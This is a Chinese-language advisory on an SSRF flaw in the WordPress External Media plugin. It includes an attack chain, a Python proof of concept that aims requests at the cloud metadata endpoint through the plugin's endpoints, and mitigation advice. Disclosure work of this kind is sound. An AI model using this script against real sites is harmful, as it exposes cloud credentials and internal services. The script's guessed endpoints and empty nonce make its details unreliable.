CVE-2025-49335 WordPress External Media插件服务端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-49335

漏洞类型

SSRF（服务端请求伪造）

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress External Media插件（minnur）

漏洞概述

CVE-2025-49335是WordPress平台External Media插件中的一个服务端请求伪造（SSRF）安全漏洞。该漏洞由Patchstack安全团队的审计人员[email protected]发现并报告。External Media插件是一款用于管理WordPress网站外部媒体的工具，帮助用户集成和管理来自外部URL的媒体资源。该插件在处理用户提交的外部URL时未能正确验证请求目标的合法性，导致攻击者可以利用服务器发起对内部网络资源的访问请求。由于该漏洞具有网络攻击向量（AV:N）和低权限要求（PR:L）的特点，攻击者无需特殊权限即可利用此漏洞发起攻击。漏洞影响范围覆盖External Media插件1.0.36及以下所有版本。CVSS 3.1评分4.9分，属于中等严重程度。虽然评分未达到高危标准，但SSRF漏洞可能导致敏感信息泄露、内网资源被非法访问等严重后果，攻击者可能利用该漏洞探测内网服务、访问云元数据接口、读取本地文件等。

技术细节

Server-Side Request Forgery（SSRF）是一种利用目标服务器发起网络请求的安全漏洞。在External Media插件中，攻击者可以通过构造特殊的外部媒体URL来欺骗服务器向任意指定的目标地址发起HTTP请求。漏洞存在于插件处理外部媒体URL的逻辑中，当用户提交一个媒体URL时，服务器会直接使用该URL发起请求而未进行充分的安全验证。攻击者可以利用此漏洞访问本不应该暴露的内部服务，例如云服务提供商的元数据端点（http://169.254.169.254/）、内网数据库管理界面、REST API接口等。漏洞的技术实现通常涉及以下几个环节：首先，攻击者通过WordPress后台或API接口提交一个精心构造的外部URL；其次，插件接收到该URL后，在服务器端发起HTTP请求；第三，由于缺乏对URL目标的验证，请求可以指向内网IP（如10.x.x.x、192.168.x.x）或云元数据服务；最后，攻击者获取返回的敏感信息或利用返回结果进一步渗透系统。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标WordPress网站并确认安装了External Media插件（版本<=1.0.36），可以通过扫描网站插件列表或访问插件相关页面进行确认

STEP 2

步骤2: 构造恶意请求

攻击者构造包含SSRF payload的外部媒体URL，将目标指向内网IP地址、云元数据服务（如169.254.169.254）或其他敏感内部资源

STEP 3

步骤3: 发送恶意请求

通过WordPress后台界面、AJAX接口或REST API发送恶意请求，触发插件的外部媒体获取功能

STEP 4

步骤4: 服务器端请求执行

插件接收到恶意URL后，在服务器端发起HTTP请求，由于缺乏URL目标验证，请求被发送至攻击者指定的内网地址

STEP 5

步骤5: 获取敏感信息

服务器将请求结果返回给攻击者，攻击者可能获取到云服务凭证、数据库配置、内部API响应等敏感信息

STEP 6

步骤6: 横向移动或进一步渗透

利用获取的敏感信息进行进一步攻击，例如使用云凭证访问更多资源、使用内网服务凭据进行横向移动等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-49335 SSRF PoC - WordPress External Media Plugin
# Target: WordPress site with External Media plugin <= 1.0.36

import requests
import sys
from urllib.parse import quote

def exploit_ssrf(target_url, target_internal_host):
    """
    Exploit SSRF vulnerability in External Media plugin
    target_url: Base URL of WordPress site
    target_internal_host: Internal host to target (e.g., 169.254.169.254 for AWS metadata)
    """
    
    # Construct malicious URL targeting internal resource
    ssrf_payload = f"http://{target_internal_host}/latest/meta-data/"
    
    # Try different parameter names commonly used in media plugins
    endpoints = [
        "/wp-admin/admin-ajax.php",
        "/wp-json/external-media/v1/import",
        "/wp-admin/admin.php?page=external-media"
    ]
    
    for endpoint in endpoints:
        try:
            # Method 1: AJAX endpoint
            data = {
                'action': 'external_media_import',
                'media_url': ssrf_payload,
                '_wpnonce': ''  # May need valid nonce
            }
            
            response = requests.post(
                target_url + endpoint,
                data=data,
                timeout=10,
                verify=False
            )
            
            print(f"[*] Target: {target_url + endpoint}")
            print(f"[*] Status Code: {response.status_code}")
            
            if response.status_code == 200 and len(response.text) > 0:
                print(f"[!] Potential SSRF - Response received:")
                print(response.text[:500])
                return True
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Error targeting {endpoint}: {e}")
            
    return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-49335.py <target_url> <internal_host>")
        print("Example: python cve-2025-49335.py http://example.com 169.254.169.254")
        sys.exit(1)
    
    target = sys.argv[1]
    internal_host = sys.argv[2]
    
    exploit_ssrf(target, internal_host)

影响范围

External Media插件 <= 1.0.36

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制用户上传外部媒体的权限，仅允许管理员级别用户使用该功能；2）配置Web服务器防火墙规则，阻止从WordPress服务器访问内网IP段（如10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）和云元数据端点（169.254.169.254）；3）暂时禁用External Media插件，待官方发布安全更新后再重新启用；4）实施网络隔离，确保Web服务器无法直接访问敏感的内部服务和云元数据接口；5）加强对WordPress管理员账户的安全防护，防止攻击者获得利用该漏洞所需的权限。